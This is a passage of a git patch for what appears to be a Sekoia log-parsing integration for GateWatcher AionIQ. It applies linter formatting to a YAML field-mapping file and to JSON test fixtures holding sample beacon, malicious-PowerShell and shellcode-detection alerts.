+          gatewatcher.matched_event.file.size: "{{json_load.message.matched_event.file.size}}"
+          gatewatcher.matched_event.file.magic: "{{json_load.message.matched_event.file.magic}}"
+          gatewatcher.matched_event.file.state: "{{json_load.message.matched_event.file.state}}"
+          gatewatcher.matched_event.file.tx_id: "{{json_load.message.matched_event.file.tx_id}}"
+          gatewatcher.matched_event.file.stored: "{{json_load.message.matched_event.file.stored}}"
+          gatewatcher.matched_event.file.hash.md5: "{{json_load.message.matched_event.file.hash.md5}}"
+          gatewatcher.matched_event.file.hash.sha256: "{{json_load.message.matched_event.file.hash.sha256}}"
   ransomware_detect:
     actions:
       - set:
-          gatewatcher.ransomware.session_score: '{{json_load.message.ransomware.session_score}}'
-          gatewatcher.ransomware.alert_threshold: '{{json_load.message.ransomware.alert_threshold}}'
-          gatewatcher.ransomware.malicious_behavior_confidence: '{{json_load.message.ransomware.malicious_behavior_confidence}}'
-        filter: ''
-        name: set
+          gatewatcher.ransomware.session_score: "{{json_load.message.ransomware.session_score}}"
+          gatewatcher.ransomware.alert_threshold: "{{json_load.message.ransomware.alert_threshold}}"
+          gatewatcher.ransomware.malicious_behavior_confidence: "{{json_load.message.ransomware.malicious_behavior_confidence}}"
   dga_detect:
     actions:
       - set:
-          gatewatcher.dga.top_DGA: '{{json_load.message.dga.top_DGA}}'
-          gatewatcher.dga.dga_count: '{{json_load.message.dga.dga_count}}'
-          gatewatcher.dga.dga_ratio: '{{json_load.message.dga.dga_ratio}}'
-          gatewatcher.dga.nx_domain_count: '{{json_load.message.dga.nx_domain_count}}'
-          gatewatcher.dga.malware_behavior_confidence: '{{json_load.message.dga.malware_behavior_confidence}}'
-        filter: ''
-        name: set
+          gatewatcher.dga.top_DGA: "{{json_load.message.dga.top_DGA}}"
+          gatewatcher.dga.dga_count: "{{json_load.message.dga.dga_count}}"
+          gatewatcher.dga.dga_ratio: "{{json_load.message.dga.dga_ratio}}"
+          gatewatcher.dga.nx_domain_count: "{{json_load.message.dga.nx_domain_count}}"
+          gatewatcher.dga.malware_behavior_confidence: "{{json_load.message.dga.malware_behavior_confidence}}"
   network_behavior_analytics:
     actions:
       - set:
-          gatewatcher.nba.gid: '{{json_load.message.nba.gid}}'
-          gatewatcher.nba.rev: '{{json_load.message.nba.rev}}'
-          gatewatcher.nba.action: '{{json_load.message.nba.action}}'
-          gatewatcher.nba.packet: '{{json_load.message.nba.packet}}'
-          gatewatcher.nba.stream: '{{json_load.message.nba.stream}}'
-          gatewatcher.nba.payload: '{{json_load.message.nba.payload}}'
-          gatewatcher.nba.category: '{{json_load.message.nba.category}}'
-          gatewatcher.nba.signature: '{{json_load.message.nba.signature}}'
-          gatewatcher.nba.signature_id: '{{json_load.message.nba.signature_id}}'
-          gatewatcher.nba.payload_printable: '{{json_load.message.nba.payload_printable}}'
-          gatewatcher.nba.metadata.performance_impact: '{{json_load.message.nba.metadata.performance_impact}}'
-          gatewatcher.nba.metadata.signature_severity: '{{json_load.message.nba.metadata.signature_severity}}'
-        filter: ''
-        name: set
+          gatewatcher.nba.gid: "{{json_load.message.nba.gid}}"
+          gatewatcher.nba.rev: "{{json_load.message.nba.rev}}"
+          gatewatcher.nba.action: "{{json_load.message.nba.action}}"
+          gatewatcher.nba.packet: "{{json_load.message.nba.packet}}"
+          gatewatcher.nba.stream: "{{json_load.message.nba.stream}}"
+          gatewatcher.nba.payload: "{{json_load.message.nba.payload}}"
+          gatewatcher.nba.category: "{{json_load.message.nba.category}}"
+          gatewatcher.nba.signature: "{{json_load.message.nba.signature}}"
+          gatewatcher.nba.signature_id: "{{json_load.message.nba.signature_id}}"
+          gatewatcher.nba.payload_printable: "{{json_load.message.nba.payload_printable}}"
+          gatewatcher.nba.metadata.performance_impact: "{{json_load.message.nba.metadata.performance_impact}}"
+          gatewatcher.nba.metadata.signature_severity: "{{json_load.message.nba.metadata.signature_severity}}"
   ioc:
     actions:
       - set:
-          threat.indicator.marking.tlp: '{{json_load.message.ioc.tlp}}'
-          gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}'
-          threat.indicator.type: '{{json_load.message.ioc.type}}'
-          threat.indicator.name: '{{json_load.message.ioc.value}}'
-          gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}'
-          gatewatcher.ioc.families: '{{json_load.message.ioc.families}}'
-          gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}'
-          gatewatcher.ioc.relations: '{{json_load.message.ioc.relations}}'
-          gatewatcher.ioc.signature: '{{json_load.message.ioc.signature}}'
-          gatewatcher.ioc.categories: '{{json_load.message.ioc.categories}}'
-          gatewatcher.ioc.usage_mode: '{{json_load.message.ioc.usage_mode}}'
-          gatewatcher.ioc.description: '{{json_load.message.ioc.description}}'
-          gatewatcher.ioc.package_date: '{{json_load.message.ioc.package_date}}'
-          gatewatcher.ioc.threat_actor: '{{json_load.message.ioc.threat_actor}}'
-          gatewatcher.ioc.updated_date: '{{json_load.message.ioc.updated_date}}'
-          gatewatcher.ioc.creation_date: '{{json_load.message.ioc.creation_date}}'
-          gatewatcher.ioc.meta_data.cwe: '{{json_load.message.ioc.meta_data.cwe}}'
-          gatewatcher.ioc.external_links: '{{json_load.message.ioc.external_links}}'
-          gatewatcher.ioc.targeted_sectors: '{{json_load.message.ioc.targeted_sectors}}'
-          gatewatcher.ioc.kill_chain_phases: '{{json_load.message.ioc.kill_chain_phases}}'
-          gatewatcher.ioc.targeted_countries: '{{json_load.message.ioc.targeted_countries}}'
-          gatewatcher.ioc.targeted_platforms: '{{json_load.message.ioc.targeted_platforms}}'
-          gatewatcher.ioc.meta_data.usageMode: '{{json_load.message.ioc.meta_data.usageMode}}'
-          gatewatcher.ioc.meta_data.descriptions: '{{json_load.message.ioc.meta_data.descriptions}}'
-          gatewatcher.ioc.targeted_organizations: '{{json_load.message.ioc.targeted_organizations}}'
-        filter: ''
-        name: set
-
+          threat.indicator.marking.tlp: "{{json_load.message.ioc.tlp}}"
+          gatewatcher.ioc.tags: "{{json_load.message.ioc.tags}}"
+          threat.indicator.type: "{{json_load.message.ioc.type}}"
+          threat.indicator.name: "{{json_load.message.ioc.value}}"
+          gatewatcher.ioc.case_id: "{{json_load.message.ioc.case_id}}"
+          gatewatcher.ioc.families: "{{json_load.message.ioc.families}}"
+          gatewatcher.ioc.campaigns: "{{json_load.message.ioc.campaigns}}"
+          gatewatcher.ioc.relations: "{{json_load.message.ioc.relations}}"
+          gatewatcher.ioc.signature: "{{json_load.message.ioc.signature}}"
+          gatewatcher.ioc.categories: "{{json_load.message.ioc.categories}}"
+          gatewatcher.ioc.usage_mode: "{{json_load.message.ioc.usage_mode}}"
+          gatewatcher.ioc.description: "{{json_load.message.ioc.description}}"
+          gatewatcher.ioc.package_date: "{{json_load.message.ioc.package_date}}"
+          gatewatcher.ioc.threat_actor: "{{json_load.message.ioc.threat_actor}}"
+          gatewatcher.ioc.updated_date: "{{json_load.message.ioc.updated_date}}"
+          gatewatcher.ioc.creation_date: "{{json_load.message.ioc.creation_date}}"
+          gatewatcher.ioc.meta_data.cwe: "{{json_load.message.ioc.meta_data.cwe}}"
+          gatewatcher.ioc.external_links: "{{json_load.message.ioc.external_links}}"
+          gatewatcher.ioc.targeted_sectors: "{{json_load.message.ioc.targeted_sectors}}"
+          gatewatcher.ioc.kill_chain_phases: "{{json_load.message.ioc.kill_chain_phases}}"
+          gatewatcher.ioc.targeted_countries: "{{json_load.message.ioc.targeted_countries}}"
+          gatewatcher.ioc.targeted_platforms: "{{json_load.message.ioc.targeted_platforms}}"
+          gatewatcher.ioc.meta_data.usageMode: "{{json_load.message.ioc.meta_data.usageMode}}"
+          gatewatcher.ioc.meta_data.descriptions: "{{json_load.message.ioc.meta_data.descriptions}}"
+          gatewatcher.ioc.targeted_organizations: "{{json_load.message.ioc.targeted_organizations}}"

From 5398fa328765efce5efd63617d816ecd8f8ba46a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 1 Oct 2024 19:19:55 +0200
Subject: [PATCH 098/317] chore(GateWatcher): apply linter

---
 GateWatcher/aioniq_ecs/tests/beacon_event.json                | 4 ++--
 .../aioniq_ecs/tests/codebreaker_powershell_alert.json        | 4 ++--
 GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json | 4 ++--
 GateWatcher/aioniq_ecs/tests/dga_event.json                   | 4 ++--
 GateWatcher/aioniq_ecs/tests/history.json                     | 4 ++--
 GateWatcher/aioniq_ecs/tests/ioc.json                         | 4 ++--
 GateWatcher/aioniq_ecs/tests/malcore_event.json               | 4 ++--
 GateWatcher/aioniq_ecs/tests/metadata.json                    | 4 ++--
 GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json           | 4 ++--
 GateWatcher/aioniq_ecs/tests/nba.json                         | 4 ++--
 GateWatcher/aioniq_ecs/tests/ransomware.json                  | 4 ++--
 GateWatcher/aioniq_ecs/tests/retrohunt.json                   | 4 ++--
 GateWatcher/aioniq_ecs/tests/sigflow_alert.json               | 4 ++--
 GateWatcher/aioniq_ecs/tests/sigflow_stats.json               | 4 ++--
 14 files changed, 28 insertions(+), 28 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json
index 3626c4db0..228c38f0c 100644
--- a/GateWatcher/aioniq_ecs/tests/beacon_event.json
+++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"tls\": {\n    \"client\": {\n      \"server_name\": \"cisco-update.com\"\n    }\n  },\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n    \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n    \"severity\": 3,\n    \"module\": \"beacon_detect\",\n    \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"kind\": \"alert\",\n    \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n    \"dataset\": \"alert\"\n  },\n  \"source\": {\n    \"ip\": \"10.0.0.60\",\n    \"mac\": \"60:57:18:e9:4f:5d\"\n  },\n  \"beacon\": {\n    \"mean_time_interval\": 1,\n    \"active\": true,\n    \"possible_cnc\": \"not_recognized\",\n    \"session_count\": 260,\n    \"type\": \"constant\",\n    \"id\": \"c4c886b4ad\",\n    \"hostname_resolution\": \"not_analyzed\"\n  },\n  \"destination\": {\n    \"ip\": \"157.230.93.100\",\n    \"port\": 443\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n  \"url\": {\n    \"domain\": \"cisco-update.com\"\n  },\n  \"network\": {\n    \"protocol\": \"tls\",\n    \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"transport\": \"tcp\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"tls\": {\n    \"client\": {\n      \"server_name\": \"cisco-update.com\"\n    }\n  },\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n    \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n    \"severity\": 3,\n    \"module\": \"beacon_detect\",\n    \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"kind\": \"alert\",\n    \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n    \"dataset\": \"alert\"\n  },\n  \"source\": {\n    \"ip\": \"10.0.0.60\",\n    \"mac\": \"60:57:18:e9:4f:5d\"\n  },\n  \"beacon\": {\n    \"mean_time_interval\": 1,\n    \"active\": true,\n    \"possible_cnc\": \"not_recognized\",\n    \"session_count\": 260,\n    \"type\": \"constant\",\n    \"id\": \"c4c886b4ad\",\n    \"hostname_resolution\": \"not_analyzed\"\n  },\n  \"destination\": {\n    \"ip\": \"157.230.93.100\",\n    \"port\": 443\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n  \"url\": {\n    \"domain\": \"cisco-update.com\"\n  },\n  \"network\": {\n    \"protocol\": \"tls\",\n    \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"transport\": \"tcp\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"tls\": {\n    \"client\": {\n      \"server_name\": \"cisco-update.com\"\n    }\n  },\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n    \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n    \"severity\": 3,\n    \"module\": \"beacon_detect\",\n    \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"kind\": \"alert\",\n    \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n    \"dataset\": \"alert\"\n  },\n  \"source\": {\n    \"ip\": \"10.0.0.60\",\n    \"mac\": \"60:57:18:e9:4f:5d\"\n  },\n  \"beacon\": {\n    \"mean_time_interval\": 1,\n    \"active\": true,\n    \"possible_cnc\": \"not_recognized\",\n    \"session_count\": 260,\n    \"type\": \"constant\",\n    \"id\": \"c4c886b4ad\",\n    \"hostname_resolution\": \"not_analyzed\"\n  },\n  \"destination\": {\n    \"ip\": \"157.230.93.100\",\n    \"port\": 443\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n  \"url\": {\n    \"domain\": \"cisco-update.com\"\n  },\n  \"network\": {\n    \"protocol\": \"tls\",\n    \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"transport\": \"tcp\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
index d6d87aeb8..5d691dec4 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n    \"flow_id\": 779924698221176\n  },\n  \"source\": {\n    \"port\": 35444,\n    \"ip\": \"10.127.0.111\"\n  },\n  \"destination\": {\n    \"port\": 4242,\n    \"ip\": \"10.127.0.222\"\n  },\n  \"malicious_powershell\": {\n    \"proba_obfuscated\": 1,\n    \"score\": 1890,\n    \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n    \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n    \"score_details\": {\n      \"StrReplace\": 0,\n      \"StreamReader\": 0,\n      \"StartBitsTransfer\": 0,\n      \"InvokeRestMethod\": 0,\n      \"Base64\": 1520,\n      \"StreamWriter\": 0,\n      \"InvokeExpression\": 0,\n      \"SystemIOFile\": 0,\n      \"StrJoin\": 0,\n      \"StrCat\": 370,\n      \"WebClientInvokation\": 0,\n      \"GetContent\": 0,\n      \"FmtStr\": 0,\n      \"CharInt\": 0,\n      \"InvokeWebRequest\": 0,\n      \"AddContent\": 0,\n      \"SetContent\": 0\n    }\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n    \"kind\": \"alert\",\n    \"module\": \"malicious_powershell_detect\",\n    \"severity\": 1,\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"created\": \"2024-09-11T09:11:52.735668+0000\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n    \"flow_id\": 779924698221176\n  },\n  \"source\": {\n    \"port\": 35444,\n    \"ip\": \"10.127.0.111\"\n  },\n  \"destination\": {\n    \"port\": 4242,\n    \"ip\": \"10.127.0.222\"\n  },\n  \"malicious_powershell\": {\n    \"proba_obfuscated\": 1,\n    \"score\": 1890,\n    \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n    \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n    \"score_details\": {\n      \"StrReplace\": 0,\n      \"StreamReader\": 0,\n      \"StartBitsTransfer\": 0,\n      \"InvokeRestMethod\": 0,\n      \"Base64\": 1520,\n      \"StreamWriter\": 0,\n      \"InvokeExpression\": 0,\n      \"SystemIOFile\": 0,\n      \"StrJoin\": 0,\n      \"StrCat\": 370,\n      \"WebClientInvokation\": 0,\n      \"GetContent\": 0,\n      \"FmtStr\": 0,\n      \"CharInt\": 0,\n      \"InvokeWebRequest\": 0,\n      \"AddContent\": 0,\n      \"SetContent\": 0\n    }\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n    \"kind\": \"alert\",\n    \"module\": \"malicious_powershell_detect\",\n    \"severity\": 1,\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"created\": \"2024-09-11T09:11:52.735668+0000\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n    \"flow_id\": 779924698221176\n  },\n  \"source\": {\n    \"port\": 35444,\n    \"ip\": \"10.127.0.111\"\n  },\n  \"destination\": {\n    \"port\": 4242,\n    \"ip\": \"10.127.0.222\"\n  },\n  \"malicious_powershell\": {\n    \"proba_obfuscated\": 1,\n    \"score\": 1890,\n    \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n    \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n    \"score_details\": {\n      \"StrReplace\": 0,\n      \"StreamReader\": 0,\n      \"StartBitsTransfer\": 0,\n      \"InvokeRestMethod\": 0,\n      \"Base64\": 1520,\n      \"StreamWriter\": 0,\n      \"InvokeExpression\": 0,\n      \"SystemIOFile\": 0,\n      \"StrJoin\": 0,\n      \"StrCat\": 370,\n      \"WebClientInvokation\": 0,\n      \"GetContent\": 0,\n      \"FmtStr\": 0,\n      \"CharInt\": 0,\n      \"InvokeWebRequest\": 0,\n      \"AddContent\": 0,\n      \"SetContent\": 0\n    }\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n    \"kind\": \"alert\",\n    \"module\": \"malicious_powershell_detect\",\n    \"severity\": 1,\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"created\": \"2024-09-11T09:11:52.735668+0000\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
index 048d8d91d..1ee17a006 100644
--- a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 888739207482646\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"destination\": {\n    \"port\": 6666,\n    \"ip\": \"178.160.128.2\"\n  },\n  \"source\": {\n    \"port\": 60078,\n    \"ip\": \"80.15.17.183\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"shellcode\": {\n    \"sub_type\": \"Windows_x86_32\",\n    \"encodings\": [\n      {\n        \"name\": \"Bloxor\",\n        \"count\": 4\n      }\n    ],\n    \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n    \"analysis\": [\n      {\n        \"call\": \"kernel32_LoadLibraryA\",\n        \"args\": \"{lpFileName: user32.dll}\",\n        \"_id\": 0,\n        \"ret\": \"0x70600000\"\n      },\n      {\n        \"call\": \"user32_MessageBoxA\",\n        \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n        \"_id\": 1,\n        \"ret\": \"1\"\n      },\n      {\n        \"call\": \"kernel32_ExitProcess\",\n        \"args\": \"{uExitCode: 0}\",\n        \"_id\": 2,\n        \"ret\": \"0\"\n      },\n      {\n        \"info\": \"Stop : End of shellcode (Exit)\",\n        \"_id\": -1\n      }\n    ],\n    \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n  },\n  \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"shellcode_detect\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"severity\": 1,\n    \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n    \"created\": \"2024-09-11T15:36:36.068564+0000\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 888739207482646\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"destination\": {\n    \"port\": 6666,\n    \"ip\": \"178.160.128.2\"\n  },\n  \"source\": {\n    \"port\": 60078,\n    \"ip\": \"80.15.17.183\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"shellcode\": {\n    \"sub_type\": \"Windows_x86_32\",\n    \"encodings\": [\n      {\n        \"name\": \"Bloxor\",\n        \"count\": 4\n      }\n    ],\n    \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n    \"analysis\": [\n      {\n        \"call\": \"kernel32_LoadLibraryA\",\n        \"args\": \"{lpFileName: user32.dll}\",\n        \"_id\": 0,\n        \"ret\": \"0x70600000\"\n      },\n      {\n        \"call\": \"user32_MessageBoxA\",\n        \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n        \"_id\": 1,\n        \"ret\": \"1\"\n      },\n      {\n        \"call\": \"kernel32_ExitProcess\",\n        \"args\": \"{uExitCode: 0}\",\n        \"_id\": 2,\n        \"ret\": \"0\"\n      },\n      {\n        \"info\": \"Stop : End of shellcode (Exit)\",\n        \"_id\": -1\n      }\n    ],\n    \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n  },\n  \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"shellcode_detect\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"severity\": 1,\n    \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n    \"created\": \"2024-09-11T15:36:36.068564+0000\"\n  }\n}"
+    }
   },
   "expected": {
